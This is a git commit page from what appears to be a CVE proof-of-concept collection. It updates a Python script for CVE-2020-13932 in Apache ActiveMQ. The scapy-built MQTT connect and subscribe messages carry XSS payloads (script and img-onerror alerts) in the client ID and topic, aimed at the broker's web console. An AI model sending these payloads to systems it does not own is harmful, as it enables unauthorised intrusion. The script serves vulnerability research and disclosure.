update cve/apache-activemq/2020/CVE-2020-13932/poc.py.
Signed-off-by: ZodiacLyu <lvyusong@buaa.edu.cn>
This commit is contained in:
ZodiacLyu
Re3et
parent
cd94b89bfd
commit
af6a794492
|
|
@ -1,18 +1,22 @@
|
||||||
from scapy.contrib.mqtt import *
|
|
||||||
from scapy.compat import raw
|
|
||||||
import time
|
import time
|
||||||
import socket
|
import socket
|
||||||
|
from scapy.contrib.mqtt import *
|
||||||
|
from scapy.compat import raw
|
||||||
|
|
||||||
brokerIP = "" # input the server IP here
|
brokerIP = "" # input the server IP here
|
||||||
brokerPort = 1883 # The default listen port of MQTT is 1883
|
brokerPort = 1883 # The default listen port of MQTT is 1883
|
||||||
clientid = "<script>alert(1)</script>" # malformed clientid
|
clientid = "<script>alert(0)</script>" #Malformed Clientid
|
||||||
|
malformedTopic = "<img src=\"1.1.1.1\" onerror=\"alert(1)\">" # Malformed Topic
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid)
|
connMessage = MQTT() / MQTTConnect(protoname="MQTT", protolevel=4, clientId=clientid)
|
||||||
# craft the malformed connect message
|
# Malformed Connect Message
|
||||||
|
subMessage = MQTT(QOS=1) / MQTTSubscribe(topics=MQTTTopicQOS(topic=malformedTopic, QOS=0), msgid=1)
|
||||||
|
# Malformed Subscribe Message
|
||||||
conn = socket.socket()
|
conn = socket.socket()
|
||||||
conn.connect((brokerIP, brokerPort))
|
conn.connect((brokerIP, brokerPort))
|
||||||
conn.send(raw(connMessage))
|
conn.send(raw(connMessage))
|
||||||
# Then check the dashboard to see malformed connection
|
time.sleep(1)
|
||||||
time.sleep(20)
|
conn.send(raw(subMessage))
|
||||||
conn.close()
|
input() # Keep the MQTT Connection
|
||||||
|
conn.close()
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue